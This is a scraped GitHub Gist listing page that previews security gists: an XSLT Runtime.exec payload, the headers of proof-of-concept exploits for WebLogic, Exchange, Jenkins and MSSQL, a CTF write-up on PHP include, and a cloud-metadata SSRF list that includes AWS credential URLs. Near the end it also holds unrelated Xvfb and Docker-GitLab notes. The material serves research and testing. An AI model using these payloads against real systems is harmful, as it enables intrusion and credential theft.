Skip to content

Instantly share code, notes, and snippets.

View wh1t3p1g's full-sized avatar
🎯
Focusing

wh1t3P1g wh1t3p1g

🎯
Focusing
1.2k followers · 131 following
View GitHub Profile
@thanatoskira
thanatoskira / select.xslt
Last active January 25, 2024 16:10
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template>
<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
<!-- #114 Utf8: open -a calculator -->
<!-- #115 String: touch /tmp/pwn -->
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
<!-- #132 Utf8: <init> -->
<AAA select="&lt;init&gt;"/>
@picar0jsu
picar0jsu / CVE-2022-21371
Last active April 26, 2023 06:59
Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion
# Exploit Title: Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion
# Date: 25/1/2022
# Exploit Author: Jonah Tan (@picar0jsu)
# Vendor Homepage: https://www.oracle.com
# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
# Tested on: Windows Server 2019, WebLogic 12.2.1.3.0, Peoplesoft 8.57.22
# CVE : CVE-2022-21371
# Description
@loknop
loknop / writeup.md
Created December 30, 2021 14:59
Solving "includer's revenge" from hxp ctf 2021 without controlling any files

Solving "includer's revenge" from hxp ctf 2021 without controlling any files

The challenge

The challenge was to achieve RCE with this file:

<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');

Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).

I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.

@testanull
testanull / PoC_CVE-2021-28482.py
Created May 2, 2021 11:10
PoC of CVE-2021-28482
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
@adamyordan
adamyordan / CVE-2019-1003000-Jenkins-RCE-POC.py
Last active July 29, 2019 09:29
CVE-2019-1003000-Jenkins-RCE-POC
#!/usr/bin/python
# Author: Adam Jordan
# Date: 2019-02-15
# Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
# PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)
import argparse
import jenkins
@3xocyte
3xocyte / bad_sequel.py
Last active January 11, 2024 01:42
PoC MSSQL RCE exploit using Resource-Based Constrained Delegation
#!/usr/bin/env python
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a rough PoC
# requirements for RCE:
# - the attacker needs to either have or create an object with a service principal name
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
# - NTLM has to be in use
@jhaddix
jhaddix / cloud_metadata.txt
Last active April 30, 2024 09:38 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@jhaddix
jhaddix / all.txt
Last active May 2, 2024 10:20
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@keepitsimple
keepitsimple / gist:a0aa7a2e10ab930d741d
Last active April 10, 2019 13:41
Ubuntu 14.04 install Xvfb
# Dependencies to make "headless" chrome/selenium work:
sudo apt-get -y install xvfb gtk2-engines-pixbuf
sudo apt-get -y install xfonts-cyrillic xfonts-100dpi xfonts-75dpi xfonts-base xfonts-scalable
echo "Starting X virtual framebuffer (Xvfb) in background..."
Xvfb -ac :99 -screen 0 1280x1024x16 &
export DISPLAY=:99
@ouyangzhiping
ouyangzhiping / docker-gitlab.md
Last active July 20, 2021 08:14
docker-gitlab部署

docker用来隔离应用还是很方便的,一来本身的操作较为简单,二来资源占用也比虚拟机要小得多,三来也较为安全,因为像数据库这样的应用不会再全局暴露端口,同时应用间的通信通过加密和端口转发,更加安全。

Gitlab是目前比较流行的开源类Github代码管理平台。Gitlab使用Rails开发,使用PostgreSQL或MySQL数据库,Redis做缓存。一般自己搭建私有代码仓库,Gitlab通常是首选。这里简单介绍一下dockerized Gitlab。

Gitlab的docker镜像早已有人做好了,并且维护相当不错。大家可以前往其GitHub仓库了解该镜像的情况。官方repo的readme中已经有详细的安装配置方案,这里我简单的梳理一下部署流程。

安装Docker

这里以Ubuntu 14.04发行版为例,在bash中输入一下命令安装最新的docker: